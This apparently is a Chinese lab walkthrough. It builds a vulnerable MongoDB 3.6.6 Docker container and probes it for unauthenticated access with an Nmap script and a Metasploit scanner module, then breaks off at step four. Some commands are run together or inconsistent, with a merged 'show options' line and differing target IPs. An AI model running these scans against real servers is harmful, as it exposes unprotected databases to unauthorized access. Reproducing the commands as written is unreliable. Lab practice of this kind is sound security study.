步骤一： 在Kali上执行以下命令搭建起MongoDB的漏洞环境..

拉取mongo(3.6.6版本)镜像

docker pull mongo:3.6.6

 启动镜像

docker run --name mongo-master -p 27017:27017 -d mongo:3.6.6 

 

查看镜像

docker ps 

步骤二：使用Nmap的插件脚本进行扫描..发现存在未授权访问漏洞.

扫描命令

nmap -p 27017 --script mongodb-info 192.168.189.141
 

 步骤三:也可尝试使用MSF中的模块进行漏洞测试….不需要认证即可直接连接..

依次输入。。。

msfconsole 

use auxiliary/scanner/mongodb/mongodb_loginshow options
set rhosts 192.168.4.128
set threads 15

run
退出：exploit

 步骤四：使用连接数据库。